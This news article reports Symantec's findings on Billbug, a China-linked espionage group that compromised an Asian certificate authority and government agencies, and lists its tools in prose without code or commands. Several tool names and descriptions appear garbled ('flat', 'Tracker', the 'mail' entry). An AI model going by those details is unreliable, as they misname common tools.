China-linked APT Billbug compromises AsiaSecurity Affairs’ certificate authority

Since March 2022, an APT group suspected of having links to China has compromised digital certificate authorities in Asia as part of a campaign against government agencies.

State-sponsored attackers have compromised a country’s digital certificate authority in Asia as part of a cyber-espionage campaign targeting multiple government agencies in the region, Symantec has warned.

Symantec attributed the attack to a China-linked cyber-espionage group tracked as Billbug (aka Lotus Blossom, Thrip). This attribution is based on the use of tools previously attributed to this APT group.

Symantec researchers reported in 2019 that the group was using backdoors Hannotog (Backdoor.Hannotog) and Sagerunex (Backdoor.Sagerunex), both of which had been used in recent campaigns.

“Victims of this campaign include certificate authorities as well as government and defense agencies.” Read the report published by Symantec. “All victims were in different countries in Asia. Billbug is known to focus on targeting in Asian countries. In at least one government victim, a large number of machines on the network were compromised by the attackers.”

Compromise of a certificate authority could allow an attacker to issue valid code-signing certificates that can be used to sign malware to avoid detection. Compromised certificates can also be used to intercept HTTPS traffic.

The good news is that Symantec has seen no evidence that attackers were able to compromise digital certificates. The security firm notified the certificate authority of the malicious activity.

The campaign has been going on since at least March 2022.

Analysis of the attack chain indicates that the attackers are leveraging public-facing applications to gain initial access to the victim network.

Threat actors make extensive use of dual-use and land-based tools, as well as custom malware. The following is a list of tools used by this APT group:

  • ad lookup – Publicly available tools for querying Active Directory. It has legitimate uses, but is widely used by attackers to help map networks.
  • mail – The winmail.dat file can be opened.
  • WinRAR – An archive manager that can be used to archive or compress files – for example, before exfiltration.
  • flat – A tool freely available online that allows users to determine whether a specific location on the network is responding.
  • Tracker – A network tool that can be used to determine the “path” that a packet of data takes from one IP address to another. It provides the hostname, IP address, and response time to pings.
  • route – The path along which a packet of data is sent through an Internet network to an address on another network.
  • NBT scan – Open source command-line NetBIOS scanner.
  • Certutils – A Microsoft Windows utility that can be used for various malicious purposes, such as decoding messages, downloading files, and installing browser root certificates.
  • port scanner – Allows an attacker to determine which ports are open on the network and which ports may be used to send and receive data.

The APT group also uses an open source multi-level proxy tool called Stowaway to proxy external traffic to the internal network.

Cobalt Strike is a penetration testing framework that is considered by many to be commodity malware due to the frequency with which it is used by malicious actors.

“The targeting of government victims is likely motivated by espionage, and certificate authorities may be aimed at stealing legitimate digital certificates, as mentioned in the introduction,” the researchers concluded. “This attacker’s ability to compromise multiple victims simultaneously demonstrates that this threat group remains a skilled and well-resourced operator capable of sustained and widespread campaigns,”

Follow me on Twitter: @securityaffairs and Facebook and mastodon

Pierluigi Paganini

(security affairs Hacking, Certificate Authority)

Leave a Reply

Your email address will not be published. Required fields are marked *